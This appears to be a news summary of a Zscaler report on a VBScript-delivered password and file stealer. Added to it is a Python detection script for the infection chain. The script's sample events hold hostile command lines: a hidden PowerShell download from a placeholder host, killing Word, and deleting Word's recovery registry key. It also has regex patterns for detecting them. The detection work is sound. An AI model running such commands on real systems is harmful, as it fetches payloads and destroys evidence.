The malware uses a Microsoft Intermediate Language (MSIL) payload compiled to steal passwords from the victim's system, browser and FTP software, according to an Oct. 4 Zscaler blog post.
“The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate,” researchers said in the post.
The decoy appears to be a “public service” message from the Pennsylvania Department of Public Welfare that includes spam mitigation instructions.
The VBScript downloads the decoy, terminates the Microsoft Word process, downloads the payload via a PowerShell command, and removes Microsoft Word's document recovery entries through the registry.
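The staged behaviour just described (a script host terminating Word, fetching a payload through PowerShell, then clearing Word's recovery entries from the registry) is what a defender would correlate in endpoint telemetry. The following is an added example, not code from the Zscaler post: it runs a parent/child correlation over constructed Sysmon-style process-creation events, and the registry path and command lines are assumptions chosen to mirror the described chain.

```python
import re

# Constructed sample process-creation events (Sysmon-style, simplified).
# Not real telemetry; pids, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\a\Downloads\notice.vbs"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM winword.exe"},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                r"'http://example.invalid/p.exe','C:\Users\a\AppData\Roaming\p.exe')"},
    {"pid": 103, "ppid": 100, "image": r"C:\Windows\System32\reg.exe",
     # Assumed key: Word keeps document-recovery state under Office\<ver>\Word\Resiliency
     "cmdline": r"reg delete HKCU\Software\Microsoft\Office\16.0\Word\Resiliency /f"},
    # Benign PowerShell not spawned by a script host, must not be flagged
    {"pid": 200, "ppid": 10, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},
]

# One regex per stage of the described loader chain, matched on child command lines
STAGES = {
    "word_killed": re.compile(r"taskkill.*winword", re.I),
    "ps_download": re.compile(r"powershell.*(downloadfile|downloadstring|invoke-webrequest)", re.I),
    "word_recovery_cleared": re.compile(r"reg(\.exe)?\s+delete.*\\Word\\Resiliency", re.I),
}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def find_vbs_loader_chains(events, min_stages=2):
    """Return script-host processes whose children match at least min_stages stages."""
    by_parent = {}
    for ev in events:
        by_parent.setdefault(ev["ppid"], []).append(ev)
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith(SCRIPT_HOSTS):
            continue
        matched = set()
        for child in by_parent.get(ev["pid"], []):
            for name, rx in STAGES.items():
                if rx.search(child["cmdline"]):
                    matched.add(name)
        if len(matched) >= min_stages:
            findings.append({"parent_pid": ev["pid"], "script": ev["cmdline"],
                             "stages": sorted(matched)})
    return findings


if __name__ == "__main__":
    for hit in find_vbs_loader_chains(SAMPLE_EVENTS):
        print(f"script host pid {hit['parent_pid']}: {hit['stages']} <- {hit['script']}")
```

Requiring two of the three stages keeps a lone `taskkill` or a routine PowerShell invocation from firing on its own.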
Researchers said the malware performs various password-stealing activities once executed, such as checking for antivirus software and looking into the directories and files from which it will steal information.
“The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware’s C&C once it grabs the sensitive information,” the post said.
The malware seeks to steal passwords from Armory Wallet, Chrome, Firefox, CuteFTP, FileZilla, PuTTY, the Electrum bitcoin wallet and WinSCP.